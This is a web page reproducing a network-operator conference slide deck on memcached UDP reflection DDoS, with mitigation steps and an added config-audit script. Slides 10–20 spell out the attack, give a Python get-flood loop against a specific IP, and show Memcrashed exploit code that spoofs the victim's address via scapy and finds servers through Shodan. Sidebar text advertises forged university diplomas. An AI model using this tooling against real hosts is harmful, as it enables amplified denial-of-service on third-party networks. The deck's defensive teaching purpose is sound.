Company Snapshot Theme for Business by Slidesgo.pptxCompany Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptx
 
Cybersecurity Threats and Cybersecurity Best Practices
Cybersecurity Threats and Cybersecurity Best PracticesCybersecurity Threats and Cybersecurity Best Practices
Cybersecurity Threats and Cybersecurity Best Practices
 
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary  ID-IGF 2016 National Dialogue  - English (tata kelola internet / int...Summary  ID-IGF 2016 National Dialogue  - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
 
TRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptxTRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptx
 
Unidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptxUnidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptx
 
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
 
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary  IGF 2013 Bali - English (tata kelola internet / internet governance)Summary  IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
 

Memcache as udp traffic reflector

  • 1. Memcache as UDP Reflectors: A Massive Amplified DDoS the World (Attack Formulation and Mitigation) Presenter Muhammad Morshed Alam AmberIT Limited morshed@amberit.com.bd <Abror Netwroks> <Shodan Stats>
  • 2. Outlines • Memcache overview • Memcache Variables and Commands • Memcache DDoS Amplification Attack formulation, Amplification Factor • Memcache DDoS Tools (set and get requests, spoof UDP packets) • Mitigation (securing memcache servers using firewall and SASL authentication)
  • 3. Memcached Overview • Free & open source, high-performance, distributed memory object caching system • Uses key-value to store arbitrary data (strings, objects) • Set (key, Data) <= save the data in key Get(key) => give the data from key • add, delete and replace commands to strictly insert/remove data in a key • Optimizes backend database performance by temporarily storing information in cache memory
  • 4. Memcached Mitigates the Load from DB Speed up the Web App Response
  • 5. Install Memcache Service # sudo apt-get update # sudo apt-get install memcached # sudo apt-get install libmemcached-tools Check the running process: root@bdnog-memcace:~# ps aux |grep memcache Output: memcache 207 0.0 0.1 63388 1952 ? Ssl Apr12 0:02 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1
  • 6. Install Memcache Service Contd.. Verify open ports with the ss command or netstat command: # ss -tulpn | grep :11211 # netstat -tulpn | grep :11211 Configuration file: # sudo vi /etc/memcached.conf Service restart process: # sudo systemctl restart memcached
  • 7. Memcache Variables and Commands: Connecting to the Memcache service: root@bdnog-memcace:~# telnet 127.0.0.1 11211 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. stats STAT pid 12476 STAT uptime 20 STAT time 1524726956 STAT version 1.4.25 Ubuntu STAT libevent 2.0.21-stable STAT pointer_size 64 STAT rusage_user 0.008000 STAT rusage_system 0.004000 STAT curr_connections 1 STAT total_connections 2 STAT connection_structures 2 STAT reserved_fds 20 STAT cmd_get 0 STAT cmd_set 0 STAT cmd_flush 0 STAT cmd_touch 0 STAT get_hits 0 STAT get_misses 0 STAT delete_misses 0 STAT delete_hits 0 STAT incr_misses 0 STAT incr_hits 0 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 0 STAT cas_hits 0 STAT cas_badval 0 STAT touch_hits 0 STAT touch_misses 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 7 STAT bytes_written 0 STAT limit_maxbytes 67108864 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT time_in_listen_disabled_us 0 STAT threads 4 STAT conn_yields 0 STAT hash_power_level 16 STAT hash_bytes 524288 STAT hash_is_expanding 0 STAT malloc_fails 0 STAT bytes 0 STAT curr_items 0 STAT total_items 0 STAT expired_unfetched 0 STAT evicted_unfetched 0 STAT evictions 0 STAT reclaimed 0 STAT crawler_reclaimed 0 STAT crawler_items_checked 0 STAT lrutail_reflocked 0 END
• 8. Memcache-tools and outputs
  # Setting data for a key:
  set key 0 3600 16
  Welcome to BDNog
  STORED
  # Getting (returning) the value of a key:
  get key
  VALUE key 0 16
  Welcome to BDNog
  END
  Using the libmemcached-tools commands:
  root@bdnog-memcace:~# memcstat --servers 127.0.0.1
  Output: gives the present status of all memcache variables, e.g.
  STAT cmd_get 1
  STAT cmd_set 1
  root@bdnog-memcace:~# memcdump --servers 127.0.0.1
  Output: all available keys holding cached data, e.g.
  key
  root@bdnog-memcace:~# memcat --servers 127.0.0.1 key
  Output: returns the value of that key, e.g.
  Welcome to BDNog
  Syntax: set <keyname> <some_flag> <expiration_in_milliseconds> <length_of_data_to_follow>
• 9. Vulnerable Memcached Server
  • No authentication required to access it
  • Unauthorized clients can inject big payloads into the cache
  • Listens on unreliable UDP port 11211 for any source IP address
  • UDP allows unreliable data delivery: target hosts receive data without prior consent
  Stats of vulnerable memcached services available on the Internet (Qrator Labs and Akamai)
• 10. Attack Formulation
  1. Find a vulnerable memcached server listening on UDP port 11211 with a high max size value of the limit_maxbytes variable
  2. Run a memcache SET command and fill one key to its max size with data to ensure a high payload
  3. Send multiple forged GET requests for that key over continuous UDP, with the victim IP spoofed as the source
  Attacker's UDP packets contain:
  • UDP GET key requests
  • Size: 15 B, SRC IP: spoofed target IP, DST port: 11211, DST IP: memcache host
  Vulnerable memcached servers exposed on the Internet and listening on UDP port 11211
  <Victims/Targets>
  • GET responses reflected to the victim IP with (key, value)
  • The value of DATA is high, i.e. total size = (key, value) * number of requests
  • 15 B GET request => 750 kB response, 50000x amplification (Akamai report)
  • SRC IP: memcache host, DST IP: target, SRC port: 11211
• 11. Memcache Amplification DDoS on Bandwidth Consumption
  1. An attacker may use multiple vulnerable memcached servers against a specific target IP by spoofing the SRC IP
  2. The target network infrastructure is overwhelmed with UDP traffic
• 12. Trends of Protocols Used for Reflection
  Most DDoS attacks counted were Memcache (DDoSmon stats)
• 13. DDoS attack bandwidth of 1.3 Tbps on GitHub!!!
• 14. Memcached Reflection Power
  Inserting a key value into a vulnerable memcached server:
  # apt-get install python-memcache
  # python
  >>> import memcache
  >>> mc = memcache.Client(['1.2.3.4:11211'], debug=True)
  >>> mc.set('tot2', 3423443534324234234234234)
  True
  >>> mc.get('tot2')
  3423443534324234234234234
  Max key value (size) => 1 MB; repeating the get request 1024 times => 1024 MB (1 GB) of reflected UDP traffic!!!!
  • 15.
• 16. Flooding the resource with reflected UDP traffic:
  # touch get_flood.py
  #!/usr/bin/env python
  import memcache
  mc = memcache.Client(['202.4.96.85:11211'], debug=True)
  mc.set('tot2', 1347534875923423432423)
  for i in range(10000):
      mc.get('tot2')
      print i
  root@morshed-Lenovo-G40-70:~# python get_flood.py
  MemCached: MemCache: inet:202.4.96.85:11211: connect: timed out.  Marking dead.
• 19. Dump Output Packets (PPS curve):
• 20. Memcached DDoS Tools
  Sends forged UDP packets (spoofing the SRC IP as the target IP) to vulnerable memcached servers obtained using the Shodan API
  # git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
  # apt-get install python3
  # pip install shodan    ; search engine
  # pip install scapy     ; required to manipulate UDP packets
  Pass the API key collected from https://account.shodan.io/login and put in the target victim IP address to run the attack:
  # python3 Memcrashed.py
  ; "injected" is the key and some arbitrary value is inserted into the cache
  setdata = ("x00x00x00x00x00x00x00x00setx00injectedx000x003600x00%srn%srn"
  getdata = ("x00x00x00x00x00x00x00x00getx00injectedrn")
  ; using scapy: SRC IP manipulation and sending the get request on behalf of the victim/target IP
  send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata)
  send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata)
• 23. Secure memcached server to avoid DDoS amplification attacks
  Step 1: Configuring the firewall
  For TCP:
  # /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
  # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
  For UDP:
  # /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
  # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
  Or permanently disable it (for Zimbra Collaboration):
  # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
  # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
  Note: save the iptables rules and check them:
  # iptables -L -v -n
• 24. Secure memcached server to avoid DDoS amplification attacks (contd.)
  Step 2: Changing the configuration
  # sudo vim /etc/memcached.conf
  -l 127.0.0.1,172.16.3.1    ; listen only from localhost and the trusted block
  -U 0                       ; disable UDP 11211 listening
  # sudo systemctl restart memcached
• 25. Validation of filtering rules:
  # nc 202.4.96.144 11211
  # nc -u 202.4.96.144 11211
  # telnet 202.4.96.144 11211
  # sudo nmap 202.4.96.144 -p 11211 -sU -sS --script memcached-info
• 26. Adding an authorized user using SASL to the Memcached server:
  # memcstat --servers="127.0.0.1"
  Output:
  Server: 127.0.0.1 (11211)
  pid: 3831
  uptime: 9
  time: 1520028517
  version: 1.4.25
  . . .
  SASL adds authentication for memcached clients.
  # sudo vim /etc/memcached.conf
  -S     ; enable SASL
  -vv    ; enable verbose output to /var/log/memcached
  Save and close the file.
  # sudo systemctl restart memcached
  # sudo journalctl -u memcached
  Output:
  Apr 27 22:03:58 memcached systemd-memcached-wrapper[2760]: Initialized SASL.
• 27. Adding an authorized user using SASL to the Memcached server (contd.):
  # sudo apt-get install sasl2-bin    ; SASL user database
  # sudo mkdir -p /etc/sasl2
  # sudo vi /etc/sasl2/memcached.conf
  mech_list: plain
  log_level: 5
  sasldb_path: /etc/sasl2/memcached-sasldb2
  # sudo saslpasswd2 -a memcached -c -f /etc/sasl2/memcached-sasldb2 morshed
  # sudo systemctl restart memcached
  # memcstat --servers="127.0.0.1" --username=morshed --password=*passwd*
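The three configuration changes from the hardening steps above (UDP listener off, -l restricted to loopback and trusted addresses, SASL on) as an offline audit of a memcached.conf file. This is an added example, not code from the slides; both sample configs are constructed, and the "-U 0" check assumes the memcached 1.4.x behaviour the slides describe, where UDP stays enabled unless that line is present.

```python
# Added example (not from the slides): audit memcached.conf for reflector-enabling settings.
import ipaddress

# Constructed sample: a 1.4.x style config with no "-U 0", no "-l" and no "-S",
# i.e. a usable UDP reflector if port 11211 is reachable from the Internet.
WEAK_CONF = """\
# memcached default config file
-d
logfile /var/log/memcached.log
-m 64
-p 11211
-u memcache
"""

# Constructed sample: the same config after the hardening steps on the slides.
HARDENED_CONF = """\
-d
-m 64
-p 11211
-u memcache
# listen from localhost and the trusted block only
-l 127.0.0.1,172.16.3.1
# disable UDP 11211 listening
-U 0
# enable SASL
-S
"""


def parse_conf(text):
    """Map each '-x value' line to {'-x': 'value'}; comment and blank lines are skipped."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        opts[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return opts


def audit(text):
    """Return findings a defender should fix; an empty list means all three checks pass."""
    opts = parse_conf(text)
    findings = []
    if opts.get("-U") != "0":  # memcached 1.4.x serves UDP unless -U is explicitly 0
        findings.append("UDP listener enabled: add '-U 0'")
    if "-l" not in opts:
        findings.append("no -l: daemon listens on all interfaces")
    else:
        for addr in opts["-l"].split(","):
            try:
                ip = ipaddress.ip_address(addr.strip())
            except ValueError:
                findings.append("non-IP listen address %r: verify manually" % addr.strip())
                continue
            if not (ip.is_loopback or ip.is_private):
                findings.append("public listen address %s: restrict -l" % ip)
    if "-S" not in opts:
        findings.append("SASL disabled: add '-S' and a sasl2 user database")
    return findings
```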